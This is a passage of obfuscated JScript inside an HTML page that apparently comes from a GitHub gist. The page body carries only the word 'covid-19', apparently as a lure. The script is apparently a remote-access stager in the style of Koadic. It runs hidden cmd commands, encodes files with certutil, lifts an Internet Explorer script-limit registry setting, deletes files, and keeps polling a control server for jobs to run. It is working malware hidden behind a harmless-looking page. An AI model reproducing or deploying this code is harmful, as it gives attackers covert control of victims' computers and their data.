{var data=USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI(stdOutPath);}
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(stdOutPath);return data;}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP=function(cmd,fork)
{var fork=(typeof(fork)!==rsS("denifednu"))?fork:true;var c="cmd /c %c^oms^pe^c% /q /c "+cmd;USZOOYWIZS.VYAUWFCEQB.Run(cmd,5-5,!fork);}
USZOOYWIZS.WXUXMBSDFO={};USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW=function(path)
{return USZOOYWIZS.VYAUWFCEQB.ExpandEnvironmentStrings(path);}
USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ=function()
{var base=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(USZOOYWIZS.BZIYSEPGNF.FolderExists(syswow64))
return syswow64;return base+"\\System32\\";}
USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ=function(path)
{var loopcount=0;while(true)
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0)
{try
{var fd=USZOOYWIZS.BZIYSEPGNF.OpenTextFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
catch(e)
{USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);continue;}}
else
{loopcount+=1;if(loopcount>180)
{return"";}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}}
USZOOYWIZS.WXUXMBSDFO.KPPKUQVGHI=function(path,exists,certutil)
{var exists=(typeof(exists)!==rsS("denifednu"))?exists:false;var certutil=(typeof(certutil)!==rsS("denifednu"))?certutil:false;if(!USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&exists)
{var headers={};headers[rsS("sut"+"atS")]="Not"+"Exist";USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK("",headers);return"";}
var loopcount=0;while(true)
{if(USZOOYWIZS.BZIYSEPGNF.FileExists(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path))&&USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)).Size>0)
{if(USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM()=="936"||certutil)
{var newout="%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".l"+"og";USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("certut"+"il -encode "+USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path)+" "+newout);var data=USZOOYWIZS.WXUXMBSDFO.JOUFZBIORZ(newout);USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW(newout);}
else
{var fp=USZOOYWIZS.BZIYSEPGNF.GetFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
return data;}
else
{loopcount+=1;if(loopcount>180)
{return"";}
USZOOYWIZS.PUZLNFITWY.DLWSGBGTRP("ping 127."+"0.0.1 -n 2",false);}}}
USZOOYWIZS.WXUXMBSDFO.KOTINHYPQW=function(path)
{USZOOYWIZS.BZIYSEPGNF.DeleteFile(USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW(path),true);};try
{if(USZOOYWIZS.TNHTOGCTIG!="prfx")
{if(USZOOYWIZS.DYPJQVFPFC())
{var path="SOFT"+"WARE\\Mi"+"crosoft\\I"+"nternet Explor"+"er\\St"+"yles";var key="Ma"+"xScriptStat"+"ements";USZOOYWIZS.XDGAVBPIRF.VIUNPHBKRR(USZOOYWIZS.XDGAVBPIRF.RZJJYUNYBI,path,key,0xFFFFFFFF,USZOOYWIZS.XDGAVBPIRF.RWWWGIWTOM);}
USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA());try{USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");}catch(e){USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e)}
USZOOYWIZS.IQSPUIAMOB();}
else
{if(USZOOYWIZS.DYPJQVFPFC())
CanHelpTimeout();else
CanHelpLoop();}}
catch(e)
{USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH(e);}
function CanHelp()
{var epoch=new Date().getTime();var expire=parseInt(USZOOYWIZS.HIJJAGKENR);if(epoch>expire)
{return 0;}
try
{var work=USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE();if(work.status==201||work.status==202||work.status==200)
{if(work.responseText.length>0){var jobkey=work.responseText;USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX(jobkey,work.status==202);}}
else
{return 0;}}
catch(e)
{return 0;}
return 1;}
function CanHelpLoop()
{var an="undefined";while(CanHelp());USZOOYWIZS.IQSPUIAMOB();}
function CanHelpTimeout()
{var sn="undefined";for(var i=(1-1);i<(5*5-15);++i)
{if(!CanHelp())
{USZOOYWIZS.IQSPUIAMOB();return;}}
if(sn=="undefined"){USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX("");USZOOYWIZS.IQSPUIAMOB();}}
</script>
</head>
<body>
covid-19
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment